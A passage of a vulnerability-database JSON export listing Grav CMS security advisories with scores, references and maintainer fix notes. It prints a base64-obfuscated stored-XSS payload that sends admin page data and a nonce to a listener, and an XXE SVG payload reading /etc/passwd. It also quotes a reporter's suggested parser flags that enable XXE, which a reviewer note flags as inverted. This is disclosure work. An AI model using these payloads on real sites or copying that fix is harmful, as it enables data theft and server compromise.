                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:46:17Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42607",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42607"
                },
                {
                    "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/52578.py",
                    "reference_id": "CVE-2026-42607",
                    "reference_type": "exploit",
                    "scores": [],
                    "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/52578.py"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w48r-jppp-rcfw",
                    "reference_id": "GHSA-w48r-jppp-rcfw",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-w48r-jppp-rcfw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42607",
                "GHSA-w48r-jppp-rcfw"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6a4v-d3zb-67cq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95186?format=api",
            "vulnerability_id": "VCID-6quf-qqqk-43a1",
            "summary": "Grav is Vulnerable to Stored XSS via Tag Injection\n### Summary\nA low-privileged (with the ability to create a page) user can cause XSS with the injection of `svg` element. The XSS can further be escalated to dump the entire system information available under `/admin/config/info` whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).\n\n### Details\nAffected endpoint: `admin/pages/<page>`\nAffected code: `system/src/Grav/Common/Security.php`\n\n```php\n    public static function detectXss($string, array $options = null): ?string\n    {\n        // Skip any null or non string values\n        if (null === $string || !is_string($string) || empty($string)) {\n            return null;\n        }\n\n        if (null === $options) {\n            $options = static::getXssDefaults();\n        }\n\n        $enabled_rules = (array)($options['enabled_rules'] ?? null);\n        $dangerous_tags = (array)($options['dangerous_tags'] ?? null);\n        if (!$dangerous_tags) {\n            $enabled_rules['dangerous_tags'] = false;\n        }\n        $invalid_protocols = (array)($options['invalid_protocols'] ?? 
null);\n        if (!$invalid_protocols) {\n            $enabled_rules['invalid_protocols'] = false;\n        }\n        $enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });\n        if (!$enabled_rules) {\n            return null;\n        }\n\n        // Keep a copy of the original string before cleaning up\n        $orig = $string;\n\n        // URL decode\n        $string = urldecode($string);\n\n        // Convert Hexadecimals\n        $string = (string)preg_replace_callback('!(&#|\\\\\\)[xX]([0-9a-fA-F]+);?!u', static function ($m) {\n            return chr(hexdec($m[2]));\n        }, $string);\n\n        // Clean up entities\n        $string = preg_replace('!(&#[0-9]+);?!u', '$1;', $string);\n\n        // Decode entities\n        $string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, 'UTF-8');\n\n        // Strip whitespace characters\n        $string = preg_replace('!\\s!u', ' ', $string);\n        $stripped = preg_replace('!\\s!u', '', $string);\n\n        // Set the patterns we'll test against\n        $patterns = [\n            // Match any attribute starting with \"on\" or xmlns\n            'on_events' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu',\n\n            // Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols\n            'invalid_protocols' => '#(' . implode('|', array_map('preg_quote', $invalid_protocols, ['#'])) . ')(:|\\&\\#58)\\S.*?#iUu',\n\n            // Match -moz-bindings\n            'moz_binding' => '#-moz-binding[a-z\\x00-\\x20]*:#u',\n\n            // Match style attributes\n            'html_inline_styles' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(style=[^>]*(url\\:|x\\:expression).*)>?#iUu',\n\n            // Match potentially dangerous tags\n            'dangerous_tags' => '#</*(' . implode('|', array_map('preg_quote', $dangerous_tags, ['#'])) . 
')[^>]*>?#ui'\n        ];\n\n        // Iterate over rules and return label if fail\n        foreach ($patterns as $name => $regex) {\n            if (!empty($enabled_rules[$name])) {\n                if (preg_match($regex, $string) || preg_match($regex, $stripped) || preg_match($regex, $orig)) {\n                    return $name;\n                }\n            }\n        }\n\n        return null;\n    }\n```\n\nSpecifically the line:\n\n```php\n'on_events' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu',\n```\n\nassumes that the on_events will always begin with either `whitespace, ', \"` which can easily be bypassed with a simple payload like:\n\n`<img src=x onload=alert('1')>`\n\nThis XSS Filter practice is broken.\n1. Blacklisting every possible scenario that leads to XSS isn't possible.\n2. Regex can't parse HTML.\n\nIt would be better to use an HTMLPurifier.\n### PoC\nGrav Core + Admin Plugin\nGrav Version: `v1.7.49.5 - Admin v1.10.49.1`\n\n1. Create a low-privileged user with only enough permission to login and perform CRUD on Pages.\n![User Perms](https://imgur.com/VkhtE9L.png)\n\n2. Login as the low-privileged user and browse to pages:\n![Pages](https://imgur.com/4bmmozN.png)\n\n3. Create a post with the following content:\n```\n<svg><foreignObject><img src=x onerror=eval(atob('KGFzeW5jKCk9PntsZXQgcj1hd2FpdCBmZXRjaCgnL2dyYXYtYWRtaW4vYWRtaW4vY29uZmlnL2luZm8nKTtsZXQgdD1hd2FpdCByLnRleHQoKTtuYXZpZ2F0b3Iuc2VuZEJlYWNvbignaHR0cDovLzEyNy4wLjAuMTo4MDAxL2dyYXYtbG9nJyx0KX0pKCk7'))></foreignObject></svg>\n```\n\nThe payload base64 is decoded to: \n\n```javascript\n(async()=>{let r=await fetch('/grav-admin/admin/config/info');let t=await r.text();navigator.sendBeacon('http://127.0.0.1:8001/grav-log',t)})();\n```\n\nwhenever a user with enough privilege visits the attacker-controlled page, a request will be made to the `info` endpoint and the response will be sent to attacker beacon/listener.\n\n4. 
Save\n![Post Created](https://imgur.com/o33Erj2.png)\n\n5. Start a `ncat` listener on port `8001`.\n\n```bash\n┌──(kali㉿kali)-[~]\n└─$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\n```\n\n6. Now as a Super Admin visit the `/` of Grav `[http://localhost/grav-admin/`](http://localhost/grav-admin/) for me:\n![Visiting Grav](https://imgur.com/kjt7uc9.png)\n\n7. We get a response with the `admin-nonce` and the entire system information:\n\n```\n┌──(kali㉿kali)-[~]\n└─$ ncat -lvnp 8001\nNcat: Version 7.95 ( https://nmap.org/ncat )\nNcat: Listening on [::]:8001\nNcat: Listening on [0.0.0.0:8001](http://0.0.0.0:8001/)\nNcat: Connection from [127.0.0.1:44658](http://127.0.0.1:44658/).\nPOST /grav-log HTTP/1.1\nHost: [127.0.0.1:8001](http://127.0.0.1:8001/)\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br, zstd\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 127013\nOrigin: http://localhost/\nConnection: keep-alive\nReferer: http://localhost/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: no-cors\nSec-Fetch-Site: cross-site\nPriority: u=6\n\n    <!DOCTYPE html>\n    <html lang=\"en\">\n    <head>\n            <meta charset=\"utf-8\" />\n        <title>Configuration: Info | Grav</title>\n                    <meta name=\"description\" content=\"\">\n                            <meta name=\"robots\" content=\"noindex, nofollow\">\n                <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n        <link rel=\"icon\" type=\"image/png\" href=\"/grav-admin/user/plugins/admin/themes/grav/images/favicon.png\">\n\n                                   \n\n       \n        <script type=\"text/javascript\">\n    window.GravAdmin = window.GravAdmin || {};\n    
window.GravAdmin.config = {\n        current_url: '/grav-admin/admin/config/info',\n        base_url_relative: '/grav-admin/admin',\n        base_url_simple: '/grav-admin',\n        route: 'info',\n        param_sep: ':',\n                enable_auto_updates_check: '1',\n                admin_timeout: '1800',\n        admin_nonce: '1265db72d897b4324cbe7d1781e66e3b',\n       \n       \n<SNIPPED>\n```\n\n### Impact\n\nThis is a **Stored Cross-Site Scripting (XSS)** vulnerability exploitable by a low-privileged user, which leads to **exfiltration of the admin session context**, including the **`admin_nonce`**. This nonce can be abused to **bypass CSRF protections** and **authenticate further requests** to sensitive admin endpoints. Given Grav’s support for **scheduled tasks** and extensible plugin architecture, this can be escalated to **Remote Code Execution (RCE)** under favorable conditions.\n\n**Affected Component**: Grav Core + Admin Plugin (`v1.7.49.5` / `v1.10.49.1`)  \n**Impact**: Full system compromise via RCE chain originating from low-privilege XSS.\n\n`CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H`\n`Overall CVSS Score: 9.0`\n`High Impact`\n\n---\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — will ship in **2.0.0-beta.2**. Two changes in tandem:\n\n1. **Regex bypass** (detection layer) — the `on_events` regex that missed unquoted handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details.\n\n2. **Missing dangerous tags** — `svg`, `math`, `option`, and `select` have been added to default `security.xss_dangerous_tags` in [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml). 
 `svg` and `math` allow inline scripting through their XML namespace and event-handler surface; `option`/`select` are the tags attackers use to break out of the admin's select-template context before dropping the payload.\n\nCombined with the tightened `on_events` regex, the PoC `<svg>…<script>…</script></svg>` (and the GHSA-c2q3 `</option></select><img src=x onerror=alert(1)>` variant) now trip at least one detector. The `<svg><foreignObject><img src=x onerror=…>` payload in this report likewise matches the extended `dangerous_tags` rule on its opening `<svg>` alone. Note that, as far as the files listed below show, detection is still a regex deny-list; the reporter's recommendation to replace it with a real HTML sanitizer is not part of this change.\n\n**Files:**\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) — dangerous-tags list extended.\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) — regex tightening.\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42611",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00043",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13684",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42611"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:23:37Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:23:37Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42611",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42611"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w8cg-7jcj-4vv2",
                    "reference_id": "GHSA-w8cg-7jcj-4vv2",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-w8cg-7jcj-4vv2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42611",
                "GHSA-w8cg-7jcj-4vv2"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6quf-qqqk-43a1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94869?format=api",
            "vulnerability_id": "VCID-6tq3-4hkt-y3au",
            "summary": "Grav is Vulnerable to XXE via SVG Upload\nDear Grav Security Team,\n\nA security vulnerability was discovered in Grav CMS that allows authenticated attackers to read arbitrary files from the server through XML External Entity (XXE) injection.\n\n Vulnerability Summary\n\n| Field | Details |\n|-------|---------|\n| Vulnerability Type | XML External Entity (XXE) Injection |\n| Severity | High (CVSS 7.5) |\n| Affected Versions | Grav CMS <= 1.7.x |\n| Affected Component | SVG file upload/processing |\n| CWE | CWE-611: Improper Restriction of XML External Entity Reference |\n| Authentication Required | Yes (Admin panel access) |\n\nTechnical Details\n\n Root Cause\nThe application uses `simplexml_load_string()` to process uploaded SVG files without disabling external entity loading. This allows attackers to inject XXE payloads that are processed by the XML parser.\n\n Vulnerable Code Pattern\n```php\n// Current (Vulnerable):\n$svg = simplexml_load_string($content);\n\n// No LIBXML_NOENT flag or entity loader protection\n```\n\n Attack Vector\n1. Attacker authenticates to Grav admin panel\n2. Uploads malicious SVG file via Pages → Media or File Manager plugin\n3. Server parses SVG and processes XXE entities\n4. Arbitrary file contents are exfiltrated\n\n Impact\n\nAn authenticated attacker can:\n\n1. Read sensitive files:\n   - `/etc/passwd` - System user information\n   - `user/accounts/*.yaml` - Admin credentials and 2FA secrets\n   - `user/config/system.yaml` - System configuration\n   - `.env` files - Environment secrets and API keys\n\n2. Perform SSRF - Access internal services via external entity URLs\n\n3. 
 Potential DoS - Billion laughs attack via recursive entity expansion\n\nProof of Concept\n\n Malicious SVG Payload\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE svg [\n  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100\" height=\"100\">\n  <text x=\"10\" y=\"50\">&xxe;</text>\n</svg>\n```\n\n Steps to Reproduce\n1. Login to Grav CMS admin panel\n2. Navigate to Pages → select any page → Media tab\n3. Upload the malicious SVG file\n4. Observe file contents in response/error or stored output\n\n Recommended Fix\n\n Option 1: Add XXE Protection Flags\n```php\nlibxml_use_internal_errors(true);\n$svg = simplexml_load_string($content, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);\n```\n\n> Reviewer note: the flags in Option 1 are inverted. `LIBXML_NOENT` tells libxml to *substitute* (expand) entity references and `LIBXML_DTDLOAD` loads the external DTD subset, so passing them enables the XXE rather than blocking it. Parse with `LIBXML_NONET` and without `LIBXML_NOENT` (on PHP < 8 also call `libxml_disable_entity_loader(true)` around the parse), or strip `<!DOCTYPE>`/`<!ENTITY>` declarations before parsing, as the maintainer fix below does.\n\n Option 2: Use SVG Sanitizer Library (Recommended)\n```php\nuse enshrined\\svgSanitize\\Sanitizer;\n\n$sanitizer = new Sanitizer();\n$sanitizer->removeRemoteReferences(true);\n$cleanSVG = $sanitizer->sanitize($content);\n```\n\nThe `enshrined/svg-sanitize` library properly strips XXE payloads and other malicious SVG content.\n\n Request\n\n1. Please acknowledge receipt of this report within 5 business days\n2. Please provide an estimated timeline for a security patch\n3. I am happy to assist with testing the fix\n4. I request a CVE be assigned for this vulnerability\n5. If you have a security advisory process, please include me in the credits\n\nTurki Almatrafi.\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed across two repos:\n\n1. **Grav core on the `2.0` branch** (commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8), ships in **2.0.0-beta.2**) — `VectorImageMedium::__construct` (the code path that reads width/height from an uploaded SVG) now strips `<!DOCTYPE>` and `<!ENTITY>` declarations before parsing, and calls `simplexml_load_string` with `LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING`. 
On PHP < 8 it also calls `libxml_disable_entity_loader(true)` for the duration of the parse.\n\n2. **rhukster/dom-sanitizer** (commit [`02d08ec`](https://github.com/rhukster/dom-sanitizer/commit/02d08ec)) — the library Grav ships as its SVG sanitizer. `loadDocument` now applies the same DOCTYPE/ENTITY strip and passes `LIBXML_NONET` to `loadXML`/`loadHTML`.\n\nWith both layers in place, the PoC:\n\n```xml\n<!DOCTYPE svg [\n  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100\" height=\"100\">\n  <text x=\"10\" y=\"50\">&xxe;</text>\n</svg>\n```\n\nno longer expands `&xxe;`, and the parser cannot make outbound filesystem or network requests for external entities/DTDs. Billion-laughs-style entity expansion is also neutralized because the declarations are stripped before libxml ever sees them.\n\n**Files:**\n- [`system/src/Grav/Common/Page/Medium/VectorImageMedium.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Page/Medium/VectorImageMedium.php).\n- [`tests/unit/Grav/Common/Security/SvgXxeSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/SvgXxeSecurityTest.php) — XXE neutralization + billion-laughs + plain-SVG regression.\n- dom-sanitizer: [`src/DOMSanitizer.php`](https://github.com/rhukster/dom-sanitizer/blob/main/src/DOMSanitizer.php) + two new XXE tests in its own suite.",
            "references": [
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-3446-6mgw-f79p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-3446-6mgw-f79p"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3446-6mgw-f79p",
                    "reference_id": "GHSA-3446-6mgw-f79p",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-3446-6mgw-f79p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "GHSA-3446-6mgw-f79p"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6tq3-4hkt-y3au"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47313?format=api",
            "vulnerability_id": "VCID-7jaz-7xjc-kka1",
            "summary": "Server Side Template Injection (SSTI)\nDue to unrestricted access to the Twig extension class from the Grav context, an attacker can redefine the config variable. As a result, an attacker can bypass the previous patch.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28118",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00394",
                            "scoring_system": "epss",
                            "scoring_elements": "0.60649",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28118"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28118",
                    "reference_id": "CVE-2024-28118",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28118"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r6vw-8v8r-pmp4",
                    "reference_id": "GHSA-r6vw-8v8r-pmp4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r6vw-8v8r-pmp4"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4",
                    "reference_id": "GHSA-r6vw-8v8r-pmp4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-08T15:04:35Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.45",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"
                }
